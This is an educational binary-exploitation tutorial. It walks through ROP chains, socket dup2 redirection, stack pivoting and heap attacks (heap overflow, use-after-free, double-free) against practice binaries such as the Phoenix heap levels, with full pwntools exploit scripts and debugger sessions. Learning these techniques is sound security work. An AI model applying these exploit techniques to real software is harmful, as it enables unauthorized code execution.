Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use
ROPgadget to find these.
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
    'A' * 40,
    POP_RDI,
    4,                  # oldfd -> the socket
    POP_RSI_R15,
    0,                  # newfd -> stdin
    0,                  # junk r15
    elf.plt['dup2'],
    POP_RDI,
    4,                  # oldfd -> the socket
    POP_RSI_R15,
    1,                  # newfd -> stdout
    0,                  # junk r15
    elf.plt['dup2'],
    elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
Final Exploit
from pwn import *
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
    'A' * 40,
    POP_RDI,
    4,                  # oldfd -> the socket
    POP_RSI_R15,
    0,                  # newfd -> stdin
    0,                  # junk r15
    elf.plt['dup2'],
    POP_RDI,
    4,                  # oldfd -> the socket
    POP_RSI_R15,
    1,                  # newfd -> stdout
    0,                  # junk r15
    elf.plt['dup2'],
    elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
Pwntools' ROP
These kinds of chains are where pwntools' ROP capabilities really come into their own:
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
Socat
More on socat
Most of the command is fairly logical (and the rest you can look up). The important part
is that in this scenario we don't have to redirect file descriptors, as socat does it all
for us.
What is important, however, is pty mode. Because pty mode allows you to
communicate with the process as if you were a user, it takes in input literally - including
DELETE characters. If you send a \x7f - a DELETE - it will literally delete the
previous character (as shown shortly in my Dream Diary: Chapter 1 writeup). This is
incredibly relevant because in 64-bit the \x7f is almost always present in glibc
addresses, so it's hard to avoid (although you could keep rerunning the
exploit until the rare occasion you get an 0x7e... libc base).
To bypass this we use the socat pty escape character \x16 and prepend it to any
\x7f we send across.
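The escaping itself is a one-liner. Here's a minimal sketch; escape_pty is a helper name I made up, and the address is a hypothetical libc pointer chosen only because it contains a \x7f byte.

```python
def escape_pty(payload):
    """Prefix every DELETE byte (0x7f) with the escape byte 0x16."""
    return payload.replace(b"\x7f", b"\x16\x7f")

leak = (0x7f3a1c2b4000).to_bytes(8, "little")   # hypothetical libc address
escaped = escape_pty(b"A" * 4 + leak)
print(escaped)
```

Run the whole payload through it right before sending. If the payload can contain literal \x16 bytes of its own, those probably need the same treatment, though I haven't covered that case here.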
Forking Processes
Flaws with fork()
Some processes use fork() to deal with multiple requests at once, most notably
servers.
This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the
same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you
leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from
RIP.
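The byte-at-a-time idea works because a forked child starts with a copy of the parent's memory, so the canary and addresses stay the same on every connection. Here's a self-contained sketch with a simulated oracle: SECRET and child_survives are stand-ins I invented, whereas against a real target the oracle would be "did the connection survive the overwrite or did the child crash?".

```python
SECRET = bytes.fromhex("00a1b2c3d4e5f607")   # hypothetical 8-byte canary

def child_survives(guess):
    """Stand-in oracle: the child only survives if the overwritten prefix matches."""
    return SECRET.startswith(guess)

def brute_force(length):
    """Recover `length` bytes one at a time, returning (bytes, attempts)."""
    known = b""
    attempts = 0
    for _ in range(length):
        for candidate in range(256):
            attempts += 1
            if child_survives(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            raise RuntimeError("no byte matched")
    return known, attempts

recovered, attempts = brute_force(len(SECRET))
print(recovered.hex(), attempts)
```

At worst that's 256 guesses per byte, so 8 * 256 attempts for a canary instead of 2^64 for guessing it in one go.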
I won't be making a binary for this (yet), but you can check out ippsec's Rope writeup
for HTB - Rope root was this exact technique.
Stack Pivoting
Lack of space for ROP
Overview
Stack Pivoting is a technique we use when we lack space on the stack - for example, we
have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of
the stack. There are a few ways to do this.
pop rsp gadget
Possibly the simplest, but also the least likely to exist. If there is one of these, you're
quite lucky.
xchg <reg>, rsp
If you can find a pop <reg> gadget, you can then use this xchg gadget to swap the
values with the ones in RSP. Requires about 16 bytes of stack space after the saved
return pointer:
leave; ret
This is a very interesting way of stack pivoting, and it only requires 8 bytes.
Every function (except main ) ends with a leave; ret gadget. leave is
equivalent to
mov rsp, rbp
pop rbp
That means that when we overwrite RIP the 8 bytes before that overwrite RBP (you
may have noticed this before). So, cool - we can overwrite rbp using leave . How
does that help us?
Well, if we look at leave again, we notice the value in RBP gets moved to RSP! So if
we overwrite RBP and then overwrite RIP with the address of leave; ret again, the
value we put in RBP gets moved to RSP. And, even better, we don't need any more stack space
than just overwriting RIP, making it very compact.
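To see why two leave; ret sequences move RSP, here is a toy emulation. It is only a sketch: registers are a dict, memory is a dict of 8-byte slots, and all addresses are invented.

```python
def leave_ret(regs: dict, mem: dict) -> None:
    """Emulate `leave; ret` on a toy register file and qword-addressed memory."""
    # leave == mov rsp, rbp ; pop rbp
    regs["rsp"] = regs["rbp"]
    regs["rbp"] = mem[regs["rsp"]]
    regs["rsp"] += 8
    # ret == pop rip
    regs["rip"] = mem[regs["rsp"]]
    regs["rsp"] += 8

LEAVE_RET = 0x40117C     # hypothetical gadget address
FIRST_GADGET = 0x401234  # hypothetical first gadget of the ROP chain
FRAME = 0x7FFC0060       # hypothetical address of the saved RBP slot
BUFFER = FRAME - 0x60    # attacker-controlled buffer below it

# Stack after the overflow: saved RBP and saved RIP are both overwritten.
mem = {
    FRAME: BUFFER,             # saved RBP -> our buffer
    FRAME + 8: LEAVE_RET,      # saved RIP -> a second leave; ret
    BUFFER: 0x0,               # consumed by the second pop rbp
    BUFFER + 8: FIRST_GADGET,  # consumed by the second ret
}
regs = {"rbp": FRAME, "rsp": BUFFER, "rip": 0}

leave_ret(regs, mem)     # the function's own epilogue
after_first = dict(regs)
leave_ret(regs, mem)     # the gadget we returned into
```

After the first pass RBP holds the buffer address; after the second, RSP sits inside the buffer and RIP holds the first gadget stored there.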
Exploitation
Stack Pivoting
Source
#include <stdio.h>

void vuln() {
    char buffer[0x60];
    printf("Try pivoting to: %p\n", buffer);
    fgets(buffer, 0x80, stdin);
}

int main() {
    vuln();
    return 0;
}
It's fairly clear what the aim is - call winner() with the two correct parameters. The
fgets() means there's a limited number of bytes we can overflow, and it's not
enough for a regular ROP chain. There's also a leak to the start of the buffer, so we
know where to set RSP to.
We'll try two ways - using pop rsp , and using leave; ret . There's no xchg gadget,
but it's virtually identical to just popping RSP anyway.
Since I assume you know how to calculate padding, I'll tell you there are 96 bytes until we
overwrite the stored RBP and 104 (as expected) until the stored RIP.
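A quick back-of-the-envelope check of how much room the overflow gives, assuming the buffer sits directly below the saved RBP (which the 96/104 offsets suggest) and using the sizes from the source:

```python
BUFFER_SIZE = 0x60   # char buffer[0x60]
FGETS_LIMIT = 0x80   # fgets(buffer, 0x80, stdin)

offset_rbp = BUFFER_SIZE     # saved RBP follows the buffer
offset_rip = offset_rbp + 8  # saved RIP follows saved RBP
max_input = FGETS_LIMIT - 1  # fgets stores at most n-1 bytes plus a NUL

bytes_from_rip = max_input - offset_rip  # bytes available from saved RIP onwards
full_qwords = bytes_from_rip // 8        # complete 8-byte values that fit
leftover = bytes_from_rip % 8            # bytes of a further, partial value
```

That leaves room for the return address plus one more full value and part of another, which is far too little for a chain that sets two arguments and calls winner().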
Basic Setup
Just to get the basics out of the way, as this is common to both approaches:
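from pwn import *

elf = context.binary = ELF('./vuln')  # assumes the binary is ./vuln
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')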
pop rsp
Using a pop rsp gadget to stack pivot
Exploitation
Gadgets
First off, let's grab all the gadgets. I'll use ROPgadget again to do so:
Now we have all the gadgets, let's chuck them into the script:
Let's just make sure the pop works by sending a basic chain and then breaking on ret
and stepping through.
payload = flat(
    'A' * 104,
    POP_CHAIN,
    buffer,
    0,      # r13
    0,      # r14
    0       # r15
)

pause()
p.sendline(payload)
print(p.recvline())
If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it
off, attach r2.
[0x7f96f01e9dee]> db 0x004011b8
[0x7f96f01e9dee]> dc
hit breakpoint at: 4011b8
[0x004011b8]> pxq @ rsp
0x7ffce2d4fc68 0x0000000000401225 0x00007ffce2d4fc00
0x7ffce2d4fc78 0x0000000000000000 0x00007ffce2d4fd68
You may see that only the gadget + 2 more values were written; this is because our
buffer length is limited, and this is the reason we need to stack pivot. Let's step
through the first pop .
[0x004011b8]> ds
[0x00401225]> ds
[0x00401226]> dr rsp
0x7ffce2d4fc00
You may notice it's the same as our "leaked" value, so it's working. Now let's try and
pop the 0x0 into r13 .
[0x00401226]> ds
[0x00401228]> dr r13
0x4141414141414141
Remember, however, that pop r13 is equivalent to mov r13, [rsp] followed by add rsp, 8 -
the value from the top of the stack is moved into r13 . Because we moved RSP, the top of
the stack moved to our buffer and AAAAAAAA was popped into r13 - because that's what the
top of the stack points to now.
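The same behaviour can be reproduced with a toy model. This is a sketch only: memory is a dict of 8-byte slots, and the two addresses are the ones shown in the debugger session above.

```python
def pop(regs: dict, mem: dict, reg: str) -> None:
    """Emulate `pop reg`: read the top of the stack, bump RSP, write the register."""
    value = mem[regs["rsp"]]
    regs["rsp"] += 8
    regs[reg] = value  # for `pop rsp` this write wins over the increment

BUFFER = 0x7FFCE2D4FC00    # leaked buffer address
RET_SLOT = 0x7FFCE2D4FC68  # where the saved RIP lived (buffer + 104)

mem = {
    RET_SLOT + 8: BUFFER,        # value that pop rsp will load
    RET_SLOT + 16: 0x0,          # the 0 we *intended* for r13
    BUFFER: 0x4141414141414141,  # padding at the start of the buffer
}
regs = {"rsp": RET_SLOT + 8}     # state just after ret jumped to the gadget

pop(regs, mem, "rsp")
rsp_after_pivot = regs["rsp"]
pop(regs, mem, "r13")
```

The intended zero at RET_SLOT + 16 is never read, because RSP no longer points anywhere near it.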
Full Payload
Now we understand the intricacies of the pop, let's just finish the exploit off. To
account for the additional pop instructions, we have to put some junk at the beginning of
the buffer, before we put in the ropchain.
payload = flat(
    0,                  # r13
    0,                  # r14
    0,                  # r15
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,                # r15
    elf.sym['winner']
)

payload = payload.ljust(104, b'A')  # pad up to the saved RIP

payload += flat(
    POP_CHAIN,
    buffer              # rsp - now stack points to our buffer!
)
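Before sending a payload like this, it can help to sanity-check the layout offline. The sketch below rebuilds it with the standard library only; the winner address is a placeholder, the buffer address and POP_CHAIN value are the ones seen in the debugger session, and the 104-byte offset is the one stated earlier.

```python
import struct

def qwords(*values: int) -> bytes:
    """Pack each value as a little-endian 64-bit integer."""
    return b"".join(struct.pack("<Q", v) for v in values)

OFFSET_TO_RIP = 104
FGETS_LIMIT = 0x80
BUFFER = 0x7FFCE2D4FC00  # example leak from the walkthrough
POP_CHAIN = 0x401225     # address the debugger returned into
POP_RDI = 0x40122B
POP_RSI_R15 = 0x401229
WINNER = 0x401156        # placeholder, not taken from the binary

chain = qwords(0, 0, 0, POP_RDI, 0xDEADBEEF, POP_RSI_R15, 0xDEADC0DE, 0, WINNER)
payload = chain.ljust(OFFSET_TO_RIP, b"A") + qwords(POP_CHAIN, BUFFER)

fits = len(payload) <= FGETS_LIMIT - 1  # fgets keeps at most n-1 bytes
has_newline = b"\n" in payload          # a newline would cut the read short
```

The chain itself is only 72 bytes, so it has to be padded out to 104 before the two values that overwrite the saved RIP.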
Final Exploit
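from pwn import *

elf = context.binary = ELF('./vuln')  # assumes the binary is ./vuln
p = process()

# pop rsp; pop r13; pop r14; pop r15; ret (the address hit in the r2 session above)
POP_CHAIN = 0x401225
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

payload = flat(
    0,                  # r13
    0,                  # r14
    0,                  # r15
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,                # r15
    elf.sym['winner']
)

payload = payload.ljust(104, b'A')  # pad up to the saved RIP

payload += flat(
    POP_CHAIN,
    buffer              # rsp
)

pause()
p.sendline(payload)
print(p.recvline())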
leave
Using leave; ret to stack pivot
Exploitation
By calling leave; ret twice, as described, this happens:
Gadgets
LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
I won't bother stepping through it again - if you want that, check out the pop rsp
walkthrough.
payload = flat(
    'A' * 96,
    buffer,
    LEAVE_RET
)

pause()
p.sendline(payload)
print(p.recvline())
Full Payload
You might be tempted to just chuck the payload into the buffer and boom, RSP points
there, but you can't quite - as with the previous approach, there is a pop instruction
that needs to be accounted for. Again, remember leave is mov rsp, rbp followed by
pop rbp . So once you overwrite RSP, you still need to give a value for the pop rbp .
payload = flat(
    0x0,                # account for final "pop rbp"
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,                # r15
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')  # pad up to the saved RBP

payload += flat(
    buffer,
    LEAVE_RET
)
Final Exploit
from pwn import *

elf = context.binary = ELF('./vuln')  # assumes the binary is ./vuln
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
    0x0,                # rbp
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,                # r15
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')  # pad up to the saved RBP

payload += flat(
    buffer,
    LEAVE_RET
)

pause()
p.sendline(payload)
print(p.recvline())
Heap
Still learning :)
Moving onto heap exploitation does not require you to be a god at stack
exploitation, but it will require a better understanding of C and how concepts such as
pointers work. From time to time we will be discussing the glibc source code itself, and
while this can be really overwhelming, it's incredibly good practice.
I'll do everything I can to make it as simple as possible. Most references (to start with)
will be hyperlinks, so feel free to just keep the concept in mind for now, but as you
progress understanding the source will become more and more important.
Occasionally different snippets of code will be from different glibc versions, and I'll do my
best to note down which version they are from. The reason for this is that newer versions
have a lot of protections that will obscure the basic logic of the operation, so we will start
with older implementations and build up.
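The heap is an area of memory used for dynamic allocation, meaning the program requests
space at runtime as it needs it.
In C, this often means using functions such as malloc() to request the space.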
However, the heap is very slow and can take up tons of space. This means that the
developer has to tell libc when the heap data is "finished with", and it does this via calls
to free() which mark the area as available. But where there are humans there will be
implementation flaws, and no amount of protection will ever ensure code is completely
safe.
In the following sections, we will only discuss 64-bit systems (with the exception of
some parts that were written long ago). The theory is the same, but pretty much any
heap challenge (or real-world application) will be on 64-bit systems.
Chunks
Internally, every chunk - whether allocated or free - is stored in a malloc_chunk
structure. The difference is how the memory space is used.
Allocated Chunks
When space is allocated from the heap using a function such as malloc() , a pointer to
a heap address is returned. Every chunk has additional metadata that it has to store in
both its used and free states.
The chunk has two sections - the metadata of the chunk (information about the chunk)
and the user data, where the data is actually stored.
The size field is the overall size of the chunk, including metadata. It must be a
multiple of 8 , meaning the last 3 bits of the size are 0 . This allows the flags A ,
M and P to take up that space, with A being the 3rd-last bit of size , M the
2nd-last and P the last.
P is the PREV_INUSE flag, which is set when the previous adjacent chunk (the
chunk ahead) is in use
M is the IS_MMAPPED flag, which is set when the chunk is allocated via mmap()
rather than a heap mechanism such as malloc()
A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in
main_arena ; we will get to Arenas in a later section, but in essence every created
thread is provided a different arena (up to a limit) and chunks in these arenas have
the A bit set
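As a small sketch of how a raw size field splits into the real size and the three flags (the constant names and values match glibc's malloc.c; the helper itself is just for illustration):

```python
PREV_INUSE = 0x1      # P
IS_MMAPPED = 0x2      # M
NON_MAIN_ARENA = 0x4  # A
SIZE_BITS = PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA

def decode_size_field(raw: int) -> dict:
    """Split a raw size field into the chunk size and its flag bits."""
    return {
        "size": raw & ~SIZE_BITS,
        "P": bool(raw & PREV_INUSE),
        "M": bool(raw & IS_MMAPPED),
        "A": bool(raw & NON_MAIN_ARENA),
    }

decoded = decode_size_field(0x31)
```

A size field of 0x31, very common when looking at small chunks in a debugger, is therefore a 0x30-byte chunk whose previous chunk is in use.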
Free Chunks
Free chunks have additional metadata to handle the linking between them.
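struct malloc_chunk {
    INTERNAL_SIZE_T mchunk_prev_size;  /* Size of previous chunk (if free). */
    INTERNAL_SIZE_T mchunk_size;       /* Size in bytes, including overhead. */
    struct malloc_chunk *fd, *bk;      /* Double links -- used only if free. */
    struct malloc_chunk *fd_nextsize, *bk_nextsize;  /* Large blocks only. */
};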
An Overview of Freeing
When we are done with a chunk's data, the data is freed using a function such as
free() . This tells glibc that we are done with this portion of memory.
In the interest of being as efficient as possible, glibc makes a lot of effort to recycle
previously-used chunks for future requests in the program. As an example, let's say we
need 100 bytes to store a string input by the user. Once we are finished with it, we tell
glibc we are no longer going to use it. Later in the program, we have to input another
100-byte string from the user. Why not reuse that same part of memory? There's no
reason not to, right?
It is the bins that are responsible for the bulk of this memory recycling. A bin is a
(doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for
different sizes, and the operations will vary depending on the bins as well to keep high
performance.
When a chunk is freed, it is "moved" to the bin. This movement is not physical, but
rather a pointer - a reference to the chunk - is stored somewhere in the list.
Bin Operations
There are four bins: fastbins, the unsorted bin, smallbins and largebins.
When a chunk is freed, the function that does the bulk of the work in glibc is
_int_free() . I won't delve into the source code right now, but will provide hyperlinks
to glibc 2.3, a very old one without security checks. You should have a go at familiarising
yourself with what the code says, but bear in mind things have been moved about a bit
to get to where they are in the present day! You can change the version on the left in
bootlin to see how it's changed.
First, the size of the chunk is checked. If it is less than the largest fastbin size, add
it to the correct fastbin
What is consolidation? We'll be looking into this more concretely later, but it's
essentially the process of finding other free chunks around the chunk being freed and
combining them into one large chunk. This makes the reuse process more efficient.
Fastbins
Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40,
48, 56, 64, 72, 80 or 88 bytes including metadata.
Unsorted Bin
There is only one of these. When small and large chunks are freed, they end up in this
bin to speed up allocation and deallocation requests.
Essentially, this bin gives the chunks one last shot at being used. Future malloc
requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces
and return one of them, speeding up the process - this is the Last Remainder Chunk. If
the chunk requested is larger, then the chunks in this bin get moved to the respective
Small/Large bins.
Small Bins
There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the
same size are stored in the same bins. Small bins are doubly-linked and allocation and
deallocation is FIFO.
The purpose of the FD and BK pointers, as we saw before, is to point to the chunks
ahead and behind in the bin.
Before ending up in the unsorted bin, contiguous small chunks (small chunks next to
each other in memory) can coalesce (consolidate), meaning their sizes combine and
become a bigger chunk.
Large Bins
There are 63 large bins, each of which can store chunks of different sizes. The free chunks
are ordered in decreasing order of size, meaning insertions and deletions can occur at any
point in the list.
Like small chunks, large chunks can coalesce together before ending up in the unsorted
bin.
A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added
to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which
points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk
in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it
is the last chunk).
When a new chunk is freed, it's added at the front of the list (making it the head):
The fd of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of
the list
Let's have a visual demonstration (it will help)! Try out the following C program:
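#include <stdio.h>
#include <stdlib.h>

int main() {
    char *a = malloc(20);
    char *b = malloc(20);
    char *c = malloc(20);

    /* Print the addresses so they can be compared after reallocation */
    printf("a: %p\nb: %p\nc: %p\n", a, b, c);

    puts("Freeing...");
    free(a);
    free(b);
    free(c);

    puts("Allocating...");
    char *d = malloc(20);
    char *e = malloc(20);
    char *f = malloc(20);

    printf("d: %p\ne: %p\nf: %p\n", d, e, f);
}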
We get:
a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010
It can be really confusing as to why we add and remove chunks from the start of the list
(why not the end?), but it's really just the most efficient way to add an element. Let's
say we have this fastbin setup:
In this case HEAD points to a , and a points onwards to b as the next chunk in the
bin (because the fd field of a points to b ). Now let's say we free another chunk
c . If we want to add it to the end of the list like so:
This is easy, as a was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c , making it the head of the list
For reallocating the chunk, the same principle applies - it's much easier to update HEAD
to point to a by reading the fd of c than it is to traverse the entire list until it gets
to the end.
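The head-only bookkeeping can be modelled in a few lines. This is a simplified sketch, not glibc's code: chunks are just addresses, and the `fd` dict plays the role of the fd field stored inside each free chunk.

```python
class Fastbin:
    """Toy singly-linked LIFO free list that only tracks its head."""

    def __init__(self) -> None:
        self.head = 0  # 0 means the bin is empty
        self.fd = {}   # chunk address -> address of the next chunk in the bin

    def free(self, chunk: int) -> None:
        self.fd[chunk] = self.head  # new chunk points at the old head
        self.head = chunk           # new chunk becomes the head

    def malloc(self) -> int:
        chunk = self.head
        if chunk == 0:
            return 0                # empty bin (real malloc would look elsewhere)
        self.head = self.fd[chunk]  # follow fd to find the new head
        return chunk

a, b, c = 0x2292010, 0x2292030, 0x2292050
fastbin = Fastbin()
for chunk in (a, b, c):
    fastbin.free(chunk)

order = [fastbin.malloc() for _ in range(3)]
```

Both operations touch only the head and one fd value, which is why no list traversal is ever needed. The allocation order comes out as c, b, a, matching the program output above.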
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
TODO
Malloc State
Heap Overflow
Heap Overflow, much like a Stack Overflow, involves too much data being written to
the heap. This can result in us overwriting data, most importantly pointers. Overwriting
these pointers can cause user input to be copied to different locations if the program
blindly trusts data on the heap.
To introduce this (it's easier to understand with an example) I will use two vulnerable
binaries from Protostar.
heap0
http://exploit.education/phoenix/heap-zero/
Source
Luckily it gives us the source:
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct data {
    char name[64];
};

struct fp {
    void (*fp)();
    char __pad[64 - sizeof(unsigned long)];
};

void winner() {
    printf("Congratulations, you have passed this level\n");
}

void nowinner() {
    printf(
        "level has not been passed - function pointer has not been "
        "overwritten\n");
}

int main(int argc, char **argv) {
    struct data *d;
    struct fp *f;

    if (argc < 2) {
        printf("Please specify an argument to copy :-)\n");
        exit(1);
    }

    d = malloc(sizeof(struct data));
    f = malloc(sizeof(struct fp));
    f->fp = nowinner;

    strcpy(d->name, argv[1]);

    f->fp();

    return 0;
}
Analysis
So let's analyse what it does:
The weakness here is clear - it calls whatever address is stored in the function pointer
on the heap. Our input is copied into the neighbouring chunk after that pointer is set, and
there's no bounds checking whatsoever, so we can overflow into it easily.
Regular Execution
We'll break right after the strcpy and see how it looks.
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762
So, we can see that the function address is there, after our input in memory. Let's work
out the offset.
Since we want to work out how many characters we need until the pointer, I'll just use a
De Bruijn Sequence.
$ ragg2 -P 200 -r
$ r2 -d -A heap0 AAABAACAADAAE...
Let's break on and after the strcpy . That way we can check the location of the
pointer then immediately read it and calculate the offset.
[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d
So, the chunk with the pointer is located at 0x2493060 . Let's continue until the next
breakpoint.
[0x0040075d]> dc
hit breakpoint at: 0x400762
radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.
Notice we overwrote the size field, so the chunk is much bigger. But now we can
easily use the first value to work out the offset (we could also, knowing the location,
have done pxq @ 0x02493060 ).
Exploit
from pwn import *
p = elf.process(argv=[payload])
print(p.clean().decode('latin-1'))
We need to remove the null bytes because argv doesn't allow them.
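One way to do that stripping, sketched with the standard library only. The helper name and the example address are hypothetical. It relies on the upper bytes of the pointer being overwritten already being zero, which holds when the old value was another code address in the same binary.

```python
import struct

def pack_for_argv(address: int) -> bytes:
    """Pack a 64-bit little-endian address and drop its trailing null bytes."""
    packed = struct.pack("<Q", address).rstrip(b"\x00")
    if b"\x00" in packed:
        raise ValueError("address contains an interior null byte")
    return packed

WINNER = 0x4006A6  # hypothetical address, not taken from the binary
arg_tail = pack_for_argv(WINNER)
```

strcpy() then writes these three bytes followed by its own terminating null, and the remaining upper bytes of the old pointer were zero anyway.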
heap1
http://exploit.education/phoenix/heap-one/
Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

struct heapStructure {
    int priority;
    char *name;
};

int main(int argc, char **argv) {
    struct heapStructure *i1, *i2;

    i1 = malloc(sizeof(struct heapStructure));
    i1->priority = 1;
    i1->name = malloc(8);

    i2 = malloc(sizeof(struct heapStructure));
    i2->priority = 2;
    i2->name = malloc(8);

    strcpy(i1->name, argv[1]);
    strcpy(i2->name, argv[2]);

    printf("and that's a wrap folks!\n");
}

void winner() {
    printf(
        "Congratulations, you've completed this level @ %ld seconds past the "
        "Epoch\n",
        time(NULL));
}
Analysis
This program:
Prints something
Regular Execution
As we expected, we have two pairs of heapStructure and name chunks. We know the
strcpy will be copying into wherever name points, so let's read the contents of the
Look! The name pointer points to the name chunk! You can see the value 0x602030
being stored.
This isn't particularly a revelation in itself - after all, we knew there was a pointer in the
chunk. But now we're certain, and we can definitely overwrite this pointer due to the
lack of bounds checking. And because we can also control the value being written, this
essentially gives us an arbitrary write!
Exploitation
The plan, therefore, becomes:
But what function should we overwrite? The only function called after the strcpy is
printf , according to the source code. And if we overwrite printf with winner it'll
just recursively call itself forever.
Luckily, compilers like gcc compile printf as puts if there are no parameters - we
can see this with radare2:
$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x40
0x004006f0 e8fbfdffff call sym.imp.puts
So we can simply overwrite the GOT address of puts with winner . All we need to
find now is the padding until the pointer and then we're good to go.
$ ragg2 -P 200 -r
AABAA...
Break on and after the strcpy again and analyse the second chunk's name pointer.
The pointer is originally at 0x8d9050 ; once the strcpy occurs, the value there is
0x41415041414f4141 .
Final Exploit
p = elf.process(argv=[param1, param2])
print(p.clean().decode('latin-1'))
Again, null bytes aren't allowed in parameters so you have to remove them.
Use-After-Free
Much like the name suggests, this technique involves us using data once it is freed. The
weakness here is that programmers often wrongly assume that once the chunk is freed
it cannot be used and don't bother writing checks to ensure data is not freed. This
means it is possible to write data to a free chunk, which is very dangerous.
TODO: binary
Double-Free
Overview
A double-free can take a bit of time to understand, but ultimately it is very simple.
Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in
the bin is specified by the fd pointer. This means if chunk a points to chunk b ,
once chunk a is freed the next chunk in the bin is chunk b .
Controlling fd
As it sounds, we have to free the chunk twice. But how does that help?
Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:
char *a = malloc(0x20);
free(a);
free(a);
Fairly logical.
But what happens if we called malloc() again for the same size?
char *b = malloc(0x20);
Well, strange things would happen. a is both allocated (in the form of b ) and free
at the same time.
If you remember, the heap attempts to save as much space as possible and when the
chunk is free the fd pointer is written where the user data used to be.
When we write into the user data of b , we're writing into the fd of a at the same
time.
And remember - controlling fd means we can control where the next chunk gets
allocated!
So we can write an address into the data of b , and that's where the next chunk gets
placed.
strcpy(b, "\x78\x56\x34\x12");
Now, the next alloc will return a again. This doesn't matter, we want the one
afterwards.
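The whole sequence can be replayed on a toy fastbin. This is a sketch with no protections modelled: the chunk address is invented, and `write()` stands in for writing user data, which overlaps the fd field of the same chunk.

```python
class ToyFastbin:
    """Unprotected LIFO free list; fd lives where user data would be."""

    def __init__(self) -> None:
        self.head = 0
        self.fd = {}

    def free(self, chunk: int) -> None:
        self.fd[chunk] = self.head
        self.head = chunk

    def malloc(self) -> int:
        chunk = self.head
        self.head = self.fd.get(chunk, 0)  # unknown memory reads as 0 here
        return chunk

    def write(self, chunk: int, value: int) -> None:
        self.fd[chunk] = value  # user data and fd share the same bytes

A = 0x602010         # hypothetical chunk address
TARGET = 0x12345678  # the value written by the strcpy() above

fastbin = ToyFastbin()
fastbin.free(A)
fastbin.free(A)               # bin is now A -> A
b = fastbin.malloc()          # returns A, but A is still the head
fastbin.write(b, TARGET)      # overwrites the fd of the "free" A
second = fastbin.malloc()     # A again
third = fastbin.malloc()      # the attacker-chosen address
```

The third allocation is the interesting one: it is handed out at whatever address was written into the chunk's user data.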
Double-Free Protections
It wouldn't be fun if there were no protections, right?
#include <stdio.h>
#include <stdlib.h>

int main() {
    int *a = malloc(0x50);

    free(a);
    free(a);

    return 1;
}
Is the chunk at the top of the bin the same as the chunk being inserted?
#include <stdio.h>
#include <stdlib.h>

int main() {
    int *a = malloc(0x50);
    int *b = malloc(0x50);

    free(a);
    free(b);
    free(a);

    return 1;
}
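The difference between the two programs can be shown with a toy version of that check. This is a sketch of the idea rather than glibc's implementation: the exception class and helper are invented, and the message mirrors the one glibc prints.

```python
class DoubleFreeDetected(Exception):
    pass

class CheckedFastbin:
    """Toy fastbin that refuses to insert the chunk already at its head."""

    def __init__(self) -> None:
        self.head = 0
        self.fd = {}

    def free(self, chunk: int) -> None:
        if chunk == self.head:
            raise DoubleFreeDetected("double free or corruption (fasttop)")
        self.fd[chunk] = self.head
        self.head = chunk

def frees_accepted(sequence) -> bool:
    """Return True if every free() in the sequence passes the head check."""
    fastbin = CheckedFastbin()
    try:
        for chunk in sequence:
            fastbin.free(chunk)
    except DoubleFreeDetected:
        return False
    return True

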